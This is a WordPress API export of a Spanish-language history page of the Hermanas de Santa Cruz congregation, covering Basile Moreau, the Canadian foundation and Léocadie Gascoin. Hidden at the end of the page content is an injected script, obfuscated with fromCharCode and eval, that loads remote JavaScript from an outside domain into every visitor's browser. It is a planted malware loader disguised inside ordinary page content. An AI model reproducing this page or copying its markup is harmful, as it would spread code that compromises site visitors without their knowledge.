{"id":312,"date":"2020-12-20T20:24:58","date_gmt":"2020-12-20T20:24:58","guid":{"rendered":"https:\/\/hermanasdesantacruz.org\/?page_id=312"},"modified":"2020-12-20T23:29:03","modified_gmt":"2020-12-20T23:29:03","slug":"historia","status":"publish","type":"page","link":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/","title":{"rendered":"Historia"},"content":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]<strong>Nuestra historia<\/strong><\/p>\n<p>El Padre Basilio Moreau, fund\u00f3 oficialmente la Congregaci\u00f3n Santa Cruz (hermanos y sacerdotes) en 1837 y las hermanas en 1841, en Francia. \u00c9l quiso en sus or\u00edgenes un solo instituto constituido de tres sociedades distintas: Hermanas, Hermanos y Sacerdotes.<\/p>\n<p>En 1847, un equipo Santa Cruz fueron enviadas de misiones a Saint Laurent, en la Di\u00f3cesis de Montreal &#8211; Canad\u00e1.<\/p>\n<p>En 1883, la provincia canadiense de las Marianitas de Santa Cruz, forma una Congregaci\u00f3n aut\u00f3noma, bajo el nombre de Hermanas de Santa Cruz.<\/p>\n<p>Desde aquel tiempo, las Hermanas de Santa Cruz estamos en: Canad\u00e1, Estados Unidos, Asia, Hait\u00ed, Mali, Burkina Faso, Chile y Per\u00fa.[\/vc_column_text][\/vc_column][vc_column width=\u00bb1\/3&#8243;][vc_single_image image=\u00bb220&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb1\/4&#8243;][vc_single_image image=\u00bb316&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][vc_column width=\u00bb3\/4&#8243;][vc_column_text]<strong>Nuestras Ra\u00edces<\/strong><\/p>\n<p>Basilio Moreau dio una regla de vida a un grupo de mujeres. Al principio, ellas ayudaron a los sacerdotes y hermanos en el trabajo dom\u00e9stico. M\u00e1s adelante debido a muchos pedidos de colaboraci\u00f3n, ellas se prepararon para ense\u00f1ar y cuidar a los ni\u00f1os. Estas mujeres fueron las Marianitas de Santa Cruz, y en 1841 la primera Marianita recibi\u00f3 el h\u00e1bito religioso. Las Marianitas tomaron como devoci\u00f3n la devoci\u00f3n a Mar\u00eda Madre de los Dolores.<\/p>\n<p>La primera mujer en tomar la direcci\u00f3n de las Marianitas, fue Leocadie Gascoin, quien recibi\u00f3 el nombre religioso de Mar\u00eda de los Siete Dolores.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]<strong>Nuestro Fundador Beato Basilio Moreau<\/strong><\/p>\n<p>Noveno de catorce hermanos, naci\u00f3 el 11 de febrero de 1799 en un peque\u00f1o pueblo de Laigne en Belin, cerca de Le Mans, Francia, en la \u00e9poca de la post guerra ocasionada por la revoluci\u00f3n francesa. Sus padres Luis Moreau y Louise Pioger fueron agricultores y comerciantes de vino. Ellos no tuvieron la posibilidad de dar la educaci\u00f3n a sus hijos. S\u00f3lo Basilio y su hermana Cecile aprendieron a leer y a escribir. \u00c9l recibi\u00f3 la educaci\u00f3n de parte del sacerdote de su parroquia, el P. Provost.<\/p>\n<p>A los 15 a\u00f1os ingresa al seminario menor y dos a\u00f1os m\u00e1s tarde comienza sus estudios de filosof\u00eda y teolog\u00eda. En 1821 es ordenado como sacerdote y luego pasa a ser profesor en el seminario. A\u00f1os m\u00e1s tarde asume el rectorado de seminario y aprende a vivir la paciencia en situaciones de presi\u00f3n. Tres fuentes de paz que \u00e9l aprendi\u00f3 fueron: la humildad, amar la cruz y confiar en la providencia de Dios.<\/p>\n<p>En 1823 es nombrado director espiritual de los Hermanos de San Jos\u00e9, Congregaci\u00f3n fundada por el P. Dujarie. Doce a\u00f1os m\u00e1s tarde asume la direcci\u00f3n de estos hermanos y forma tambi\u00e9n a sacerdotes auxiliares para empezar un proyecto apost\u00f3lico que luego, en 1837 ser\u00eda oficialmente la Congregaci\u00f3n de Santa Cruz.<\/p>\n<p>En 1841 empieza un nuevo proyecto con un grupo reducido de mujeres, teniendo como colaboradora principal a Leocadie Gascoin. Este grupo se llamar\u00eda Marianitas de Santa Cruz. Estas tres sociedades: hermanas, hermanos y sacerdotes fueron guiados por Basilio Moreau, envi\u00e1ndoles de misiones por diferentes pa\u00edses.<\/p>\n<p>El P. Moreau ha hecho viajes a Roma para tener la aprobaci\u00f3n de las sociedades de Santa Cruz.<\/p>\n<p>Despu\u00e9s de a\u00f1os de trabajo apost\u00f3lico y de obras pioneras empezaron tensiones en la Congregaci\u00f3n, lo que le llev\u00f3 a renunciar como Superior General.<\/p>\n<p>Trabaja como misionero itinerante hasta su \u00faltima pr\u00e9dica, tres semanas antes de su muerte. Admiremos su celo para la misi\u00f3n en lo que \u00e9l escribe el 19 de noviembre de 1872: \u00abYo no muero a\u00fan y yo espero poder todav\u00eda, con mis 73 a\u00f1os, predicar la pr\u00f3xima Cuaresma en una parroquia de nuestra di\u00f3cesis\u201d. Es acogido a la casa del Padre el 20 de enero de 1873.[\/vc_column_text][\/vc_column][vc_column width=\u00bb1\/3&#8243;][vc_single_image image=\u00bb366&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]<strong>La Fundaci\u00f3n Canadiense<\/strong><\/p>\n<p>La llegada de un equipo Santa Cruz a Canad\u00e1 conformado por hermanas, hermanos y sacerdotes, marc\u00f3 el inicio de la misi\u00f3n en suelo canadiense franc\u00f3fono. Ellos llegaron respondiendo al pedido del obispo frente a la necesidad de educar a la juventud. Tambi\u00e9n ser\u00eda el inicio de la historia de las Hermanas de Santa Cruz como congregaci\u00f3n aut\u00f3noma.<\/p>\n<p>En 1847 llegan a Canad\u00e1 las cuatro primeras hermanas, dos acaban de hacer sus primeros votos y dos son a\u00fan novicias. Su preparaci\u00f3n misionera es s\u00f3lo la buena voluntad y su deseo de hacer el bien. Para cada una es su primera misi\u00f3n y llegan para organizar y dirigir una escuela pensionado para ni\u00f1as. Dos a\u00f1os despu\u00e9s se puede ver los frutos de la misi\u00f3n, que cuenta ya con una comunidad de 21 religiosas incluyendo novicias y postulantes, de ellas 8 son francesas y 13 son canadienses.<\/p>\n<p>En 1849 Leocadie Gascoin llega como superiora a la misi\u00f3n de Canad\u00e1, el P. Moreau le conf\u00eda la formaci\u00f3n religiosa de las hermanas y el apostolado de esta fundaci\u00f3n. Los catorce a\u00f1os de su misi\u00f3n en Canad\u00e1 se pueden llamar \u00abbuenos a\u00f1os\u00bb, ya que al mismo tiempo que ofrecen sus servicios en la Di\u00f3cesis de Montreal en Saint-Laurent, van aumentando en n\u00famero de miembros. En diecis\u00e9is a\u00f1os en Canad\u00e1, ya son 70 religiosas y pronto se convertir\u00eda en la provincia canadiense de las Marianitas de Santa Cruz.<\/p>\n<p>Luego vendr\u00edan tiempos dif\u00edciles para la provincia canadiense y para toda la Congregaci\u00f3n. Despu\u00e9s de la autonom\u00eda de las Marianitas de Indiana &#8211; EEUU, la dimisi\u00f3n del P. Moreau como superior general, y las tensiones e inquietudes que vivieron las hermanas como consecuencia de decisiones dolorosas, en 1883, la provincia canadiense inicia el proceso de separaci\u00f3n de las Marianitas de Francia.<\/p>\n<p>En 1889 siendo aprobadas las constituciones en Roma, se hace oficial la autonom\u00eda, tomando el nombre de Hermanas de Santa Cruz. Entre 1883 y 1889 se abren 14 nuevas misiones en diferentes lugares de Canad\u00e1. Respondiendo a las necesidades de los tiempos, poco despu\u00e9s abren una misi\u00f3n al este de los EEUU y mucho m\u00e1s tarde se abrir\u00edan nuevas misiones en diferentes lugares del mundo.[\/vc_column_text][\/vc_column][vc_column width=\u00bb1\/3&#8243;][vc_single_image image=\u00bb363&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]<em><strong>L\u00e9ocadie Gascoin<\/strong><\/em><\/p>\n<p>Naci\u00f3 el 01 de marzo de 1818 en Montenay, La Mayenne \u2013 Francia, en una familia creyente de recursos econ\u00f3micos estables. Hija de Michel-Jean Gascoin y Rosalie-Ren\u00e9e Chardon, fue la cuarta de seis hermanos. No ten\u00eda todav\u00eda 4 a\u00f1os cuando su madre muri\u00f3 y cinco a\u00f1os m\u00e1s tarde tambi\u00e9n su hermana, convirti\u00e9ndose ella en la responsable de la educaci\u00f3n de sus hermanos menores.<\/p>\n<p>A la edad de 18 a\u00f1os termina sus estudios. Su padre alegre de verla cumpliendo el rol de mam\u00e1, se muestra reticente al verla comenzar a manifestar el gusto por la vida religiosa.<\/p>\n<p>Al finalizar un retiro con un sacerdote de Santa Cruz, este le recomienda comunicarse con el P. Moreau. \u00c9l la conduce al Monasterio del Buen Pastor donde tres postulantes de Santa Cruz acababan de comenzar su noviciado. Al t\u00e9rmino de este retiro, ella decide prepararse a ser parte de la comunidad de Santa Cruz.<\/p>\n<p>Ella recibe el nombre religioso de la Patrona de Santa Cruz: Mar\u00eda de los Siete Dolores. Ella colabor\u00f3 de manera muy fiel a encarnar la intuici\u00f3n de Moreau frente a la Sociedad femenina.[\/vc_column_text][\/vc_column][vc_column width=\u00bb1\/3&#8243;][vc_single_image image=\u00bb321&#8243; img_size=\u00bbfull\u00bb qode_css_animation=\u00bb\u00bb][\/vc_column][\/vc_row]<script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]Nuestra historia El Padre Basilio Moreau, fund\u00f3 oficialmente la Congregaci\u00f3n Santa Cruz (hermanos y sacerdotes) en 1837 y<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-312","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Historia - Congregaci\u00f3n Hermanas de Santa Cruz<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Historia - Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]Nuestra historia El Padre Basilio Moreau, fund\u00f3 oficialmente la Congregaci\u00f3n Santa Cruz (hermanos y sacerdotes) en 1837 y [\u2026]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/\" \/>\n<meta property=\"og:site_name\" content=\"Congregaci\u00f3n Hermanas de Santa Cruz\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-20T23:29:03+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"7 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/\",\"url\":\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/\",\"name\":\"Historia - Congregaci\u00f3n Hermanas de Santa Cruz\",\"isPartOf\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\"},\"datePublished\":\"2020-12-20T20:24:58+00:00\",\"dateModified\":\"2020-12-20T23:29:03+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/hermanasdesantacruz.org\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Historia\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/hermanasdesantacruz.org\/#website\",\"url\":\"https:\/\/hermanasdesantacruz.org\/\",\"name\":\"Congregaci\u00f3n Hermanas de Santa Cruz\",\"description\":\"Hermanas de Santa Cruz - Tacna\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Historia - Congregaci\u00f3n Hermanas de Santa Cruz","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/","og_locale":"es_ES","og_type":"article","og_title":"Historia - Congregaci\u00f3n Hermanas de Santa Cruz","og_description":"[vc_row css_animation=\u00bb\u00bb row_type=\u00bbrow\u00bb use_row_as_full_screen_section=\u00bbno\u00bb type=\u00bbfull_width\u00bb angled_section=\u00bbno\u00bb text_align=\u00bbleft\u00bb background_image_as_pattern=\u00bbwithout_pattern\u00bb][vc_column width=\u00bb2\/3&#8243;][vc_column_text]Nuestra historia El Padre Basilio Moreau, fund\u00f3 oficialmente la Congregaci\u00f3n Santa Cruz (hermanos y sacerdotes) en 1837 y [\u2026]","og_url":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/","og_site_name":"Congregaci\u00f3n Hermanas de Santa Cruz","article_modified_time":"2020-12-20T23:29:03+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"7 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/","url":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/","name":"Historia - Congregaci\u00f3n Hermanas de Santa Cruz","isPartOf":{"@id":"https:\/\/hermanasdesantacruz.org\/#website"},"datePublished":"2020-12-20T20:24:58+00:00","dateModified":"2020-12-20T23:29:03+00:00","breadcrumb":{"@id":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/hermanasdesantacruz.org\/index.php\/historia\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/hermanasdesantacruz.org\/index.php\/historia\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/hermanasdesantacruz.org\/"},{"@type":"ListItem","position":2,"name":"Historia"}]},{"@type":"WebSite","@id":"https:\/\/hermanasdesantacruz.org\/#website","url":"https:\/\/hermanasdesantacruz.org\/","name":"Congregaci\u00f3n Hermanas de Santa Cruz","description":"Hermanas de Santa Cruz - Tacna","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/hermanasdesantacruz.org\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/312","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/comments?post=312"}],"version-history":[{"count":11,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/312\/revisions"}],"predecessor-version":[{"id":367,"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/pages\/312\/revisions\/367"}],"wp:attachment":[{"href":"https:\/\/hermanasdesantacruz.org\/index.php\/wp-json\/wp\/v2\/media?parent=312"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}